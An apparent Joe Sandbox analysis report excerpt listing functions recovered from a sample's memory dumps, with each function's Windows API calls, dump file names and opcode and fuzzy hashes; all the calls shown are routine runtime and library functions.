                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery
                                                  • String ID:
                                                  • API String ID: 374826692-0
                                                  • Opcode ID: c8b928bac83c50132e94fd7ce94671b1318781bdde11262ba979da59b40f3cbd
                                                  • Instruction ID: 0b54966ae8046d76c4fdb2512f831162bb2b08a85d037ed47e69af005d992454
                                                  • Opcode Fuzzy Hash: c8b928bac83c50132e94fd7ce94671b1318781bdde11262ba979da59b40f3cbd
                                                  • Instruction Fuzzy Hash: EC317275A043019FC708DF18D99592FFBE9EBC8710F00892EB988D7361DA34A8448BA2
                                                  Function 00D71518 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53e96d996332642272e26353aea66097f252a733651a27996d7f0cd4a6db00b3
                                                  • Instruction ID: 838bc0d74f14013107487f48843011f0138443ff5da6b3ba8cd79525797d88ed
                                                  • Opcode Fuzzy Hash: 53e96d996332642272e26353aea66097f252a733651a27996d7f0cd4a6db00b3
                                                  • Instruction Fuzzy Hash: C8219D35600205AF8B28AF69DC8196A77BDEF80364714C725F85ED7651FB30ED008B70
                                                  Function 00D811F6 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00D811FE
                                                    • Part of subcall function 00D810FA: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D7A9B4,?,00000000,-00000008), ref: 00D8115B
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D81236
                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D81256
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                  • String ID:
                                                  • API String ID: 158306478-0
                                                  • Opcode ID: 598b33d0dc6b8117b43f2c791ad9bd98aaa3f08b04846c603a21b52f1452e5d1
                                                  • Instruction ID: cd34db84513a33969b10d48748eac98b75607f3d3c12f4f5e2a763fa023af60f
                                                  • Opcode Fuzzy Hash: 598b33d0dc6b8117b43f2c791ad9bd98aaa3f08b04846c603a21b52f1452e5d1
                                                  • Instruction Fuzzy Hash: E41126B5900625FFA71137766C8BEBF7A6CDE453A47180526F406D2240EEB4CD0A83B9
                                                  Function 00D31340 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(00DC5CA4,?,?,?,00D4ED34,00000001), ref: 00D31397
                                                  • ReleaseSRWLockExclusive.KERNEL32(00DC5CA4,?,00D4ED34,00D4ED34,?,?,?,00D4ED34,00000001), ref: 00D313CE
                                                  • __Init_thread_header.LIBCMT ref: 00D313EB
                                                  • __Init_thread_header.LIBCMT ref: 00D31435
                                                    • Part of subcall function 00D61817: EnterCriticalSection.KERNEL32(00DC3F80,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000,00000000), ref: 00D61822
                                                    • Part of subcall function 00D61817: LeaveCriticalSection.KERNEL32(00DC3F80,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000,00000000), ref: 00D6185F
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CriticalExclusiveInit_thread_headerLockSection$AcquireEnterLeaveRelease
                                                  • String ID:
                                                  • API String ID: 35131462-0
                                                  • Opcode ID: c9b703acb947a7c0aadf4ce56bb9f0481f055fa00e4d722d5f569a6d4839b6df
                                                  • Instruction ID: 148d7b3ae22204604a031e378d745f79f1f4c0a60d837efcb7ba3e3e8119d0f1
                                                  • Opcode Fuzzy Hash: c9b703acb947a7c0aadf4ce56bb9f0481f055fa00e4d722d5f569a6d4839b6df
                                                  • Instruction Fuzzy Hash: A6218D75A007039FC710DB58FA86F593B61FF45324F640129E8059B399DB32B8898BB2
                                                  Function 00D24630 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,00000000,?,?,?,?,00D249AB,00000000,?,%s:%d: assertion %s failed: %s,..\..\buildtools\third_party\libc++\trunk\include\__tree,000000CF,__x != nullptr,node shouldn't be null), ref: 00D24643
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00D249AB,00000000,?,%s:%d: assertion %s failed: %s,..\..\buildtools\third_party\libc++\trunk\include\__tree,000000CF,__x != nullptr,node shouldn't be null), ref: 00D24658
                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D249AB,00000000,?,%s:%d: assertion %s failed: %s,..\..\buildtools\third_party\libc++\trunk\include\__tree,000000CF,__x != nullptr,node shouldn't be null), ref: 00D2466A
                                                  • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00D249AB,00000000,?,%s:%d: assertion %s failed: %s,..\..\buildtools\third_party\libc++\trunk\include\__tree,000000CF,__x != nullptr,node shouldn't be null), ref: 00D246A9
                                                    • Part of subcall function 00D273E0: AcquireSRWLockExclusive.KERNEL32(00000000,?,00D452D8), ref: 00D273E4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ExclusiveLock$Acquire$Release
                                                  • String ID:
                                                  • API String ID: 1678258262-0
                                                  • Opcode ID: 3d5654dbe9f69b770f9bb3d8b53697d1ead2af4ac2130ed5cfca428c9f9db87e
                                                  • Instruction ID: 08a601c91c30d5572e414f0160602e32bd943f006e9b0be887d055b7f0a0d0ec
                                                  • Opcode Fuzzy Hash: 3d5654dbe9f69b770f9bb3d8b53697d1ead2af4ac2130ed5cfca428c9f9db87e
                                                  • Instruction Fuzzy Hash: AD216D752003108FDB24AF60E8D8BBE7BA4FF59319F08052DE94687351CBB5A805CB71
                                                  Function 00D7148E Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,04C48300,04F70DE8,00000000,00D74F73,00000000,?,00D71337,00D74F73,?,?,?,00D2909A,?,00000001,00000000), ref: 00D714A4
                                                  • GetLastError.KERNEL32(?,00D71337,00D74F73,?,?,?,00D2909A,?,00000001,00000000,00000000,?,00D74F73,?,00D2909A,?), ref: 00D714AE
                                                  • __dosmaperr.LIBCMT ref: 00D714B5
                                                  • GetFullPathNameW.KERNEL32(?,04C48300,04F70DE8,00000000,04C48301,?,00D71337,00D74F73,?,?,?,00D2909A,?,00000001,00000000,00000000), ref: 00D714DF
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: FullNamePath$ErrorLast__dosmaperr
                                                  • String ID:
                                                  • API String ID: 1391015842-0
                                                  • Opcode ID: 034f07f692eeb47fcf705e4cf55ae2699f7d9b63c4bee5f0eb622cffc663872d
                                                  • Instruction ID: c6e1507eb7bb375d07ad447a45628678843d0be31696147f73c47366f59c7fcc
                                                  • Opcode Fuzzy Hash: 034f07f692eeb47fcf705e4cf55ae2699f7d9b63c4bee5f0eb622cffc663872d
                                                  • Instruction Fuzzy Hash: CEF0193A200305EFDA306BA9DC05A56BBA9EB44364714CA2AF55AD2960FB75E810DB70
                                                  Function 00D71428 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,04C48300,04F70DE8,00000000,00D74F73,00000000,?,00D712C5,00D74F73,00D74F73,?,?,?,00D2909A,?,00000001), ref: 00D7143E
                                                  • GetLastError.KERNEL32(?,00D712C5,00D74F73,00D74F73,?,?,?,00D2909A,?,00000001,00000000,00000000,?,00D74F73,?,00D2909A), ref: 00D71448
                                                  • __dosmaperr.LIBCMT ref: 00D7144F
                                                  • GetFullPathNameW.KERNEL32(?,04C48300,04F70DE8,00000000,04C48301,?,00D712C5,00D74F73,00D74F73,?,?,?,00D2909A,?,00000001,00000000), ref: 00D71479
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: FullNamePath$ErrorLast__dosmaperr
                                                  • String ID:
                                                  • API String ID: 1391015842-0
                                                  • Opcode ID: 08c03b5facca8de61dbe7ec030377da5e2fcec33fb7d13cc6670bfd67dbf32b2
                                                  • Instruction ID: c793eb72253d4031ec4cef5afcdd8d177729bdd18f7348b56763dbfc2f6969b0
                                                  • Opcode Fuzzy Hash: 08c03b5facca8de61dbe7ec030377da5e2fcec33fb7d13cc6670bfd67dbf32b2
                                                  • Instruction Fuzzy Hash: E9F03136200311EFDB315BA5DC05A57BBA9EF54360714CA26F55AC2520FB75E810DB70
                                                  Function 00D8A91A Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D831F7,00000000,00000001,?,?,?,00D7574B,?,00000000,00000000), ref: 00D8A931
                                                  • GetLastError.KERNEL32(?,00D831F7,00000000,00000001,?,?,?,00D7574B,?,00000000,00000000,?,?,?,00D75091,?), ref: 00D8A93D
                                                    • Part of subcall function 00D8A990: CloseHandle.KERNEL32(FFFFFFFE,00D8A94D,?,00D831F7,00000000,00000001,?,?,?,00D7574B,?,00000000,00000000,?,?), ref: 00D8A9A0
                                                  • ___initconout.LIBCMT ref: 00D8A94D
                                                    • Part of subcall function 00D8A96F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D8A90B,00D831E4,?,?,00D7574B,?,00000000,00000000,?), ref: 00D8A982
                                                  • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D831F7,00000000,00000001,?,?,?,00D7574B,?,00000000,00000000,?), ref: 00D8A962
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 030f5d21016b2aad48107d6af1f3ddb030a7069b9eb24a90003c2b661696cbbf
                                                  • Instruction ID: 87de4f7d953c68fdae61f9e139f053db5bef9d9c6fd756d0025db49249035917
                                                  • Opcode Fuzzy Hash: 030f5d21016b2aad48107d6af1f3ddb030a7069b9eb24a90003c2b661696cbbf
                                                  • Instruction Fuzzy Hash: ACF09236905219FBDF223F99DC08E9A3E66EF083B1B454252FA19D5620D67288209FB1
                                                  Function 00D618D7 Relevance: 6.0, APIs: 4, Instructions: 25COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • SleepConditionVariableCS.KERNELBASE(?,00D6183C,00000064), ref: 00D618FA
                                                  • LeaveCriticalSection.KERNEL32(00DC3F80,?,?,00D6183C,00000064,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7), ref: 00D61904
                                                  • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00D6183C,00000064,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7), ref: 00D61915
                                                  • EnterCriticalSection.KERNEL32(00DC3F80,?,00D6183C,00000064,?,?,?,00D45339,00DD0648,00000000,?,?,?,?,00D450B7,00000000), ref: 00D6191C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                  • String ID:
                                                  • API String ID: 3269011525-0
                                                  • Opcode ID: 662950a85f0884759ae29685cf66988fdd2390f5f24a2230c003c1405612df6d
                                                  • Instruction ID: 52d3ed9045af9f023ab59d61db9348750e2d8b452326ce5996a8b3e8ccd7dbc3
                                                  • Opcode Fuzzy Hash: 662950a85f0884759ae29685cf66988fdd2390f5f24a2230c003c1405612df6d
                                                  • Instruction Fuzzy Hash: 1DE06D35A8132AFBC6111B50AC08FD93B28AF0A761B04821AF54993360C7B19A008BF5
                                                  Function 00D20090 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 371COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tracing/main_trace_log
                                                  • API String ID: 0-566173763
                                                  • Opcode ID: 0e01dbe0e5bf7b7089149b6bdaabb442b235a122ea59185576be938112a5f037
                                                  • Instruction ID: 8a76f813cb8eab55801406843539e053f96e7433eba7d435ad843cd1d5ab11a9
                                                  • Opcode Fuzzy Hash: 0e01dbe0e5bf7b7089149b6bdaabb442b235a122ea59185576be938112a5f037
                                                  • Instruction Fuzzy Hash: F3D1B3B5E007219BEB219B20E841BAEBB64BFA4314F1D0518E95667342DB31FD54CBF1
                                                  Function 00D1996B Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __Init_thread_header.LIBCMT ref: 00D19EAA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446367478.0000000000DD7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_cc0000_EpIiyF_GAaICB.jbxd
                                                  Similarity
                                                  • API ID: Init_thread_header
                                                  • String ID: mber$ober
                                                  • API String ID: 3738618077-4233749566
                                                  • Opcode ID: 25948984b237065754746bae787b50eceffb9c2fec2ccc28b3f707e438bf7561
                                                  • Instruction ID: c5ed917507c8622005d48de02f3b8d6e44a8e3d436db29e2d1733d560a720592
                                                  • Opcode Fuzzy Hash: 25948984b237065754746bae787b50eceffb9c2fec2ccc28b3f707e438bf7561
                                                  • Instruction Fuzzy Hash: AFD1C0B0828B93EBE7148F14F925F547AA2E700314F54419DE4896B3E9DBB479C8CB72
                                                  Function 00D7EA67 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00D7AA4A: GetLastError.KERNEL32(?,?,00D693ED,?,?,?,?,00D72E9C,?,?,?,?), ref: 00D7AA4E
                                                    • Part of subcall function 00D7AA4A: SetLastError.KERNEL32(00000000,?,?), ref: 00D7AAF0
                                                  • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D6EC3C,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D7EB26
                                                  • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D6EC3C,?,?,?,00000055,?,-00000050,?,?), ref: 00D7EB5D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.4446147810.0000000000CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CC0000, based on PE: true
                                                  • Associated: 0000000B.00000002.4446126614.0000000000CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D95000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446225190.0000000000D9D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446289578.0000000000DC0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446307257.0000000000DC1000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DC2000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 0000000B.00000002.4446330210.0000000000DD0000.00000004.00000001.01000000.00000004.sdmpDownload File
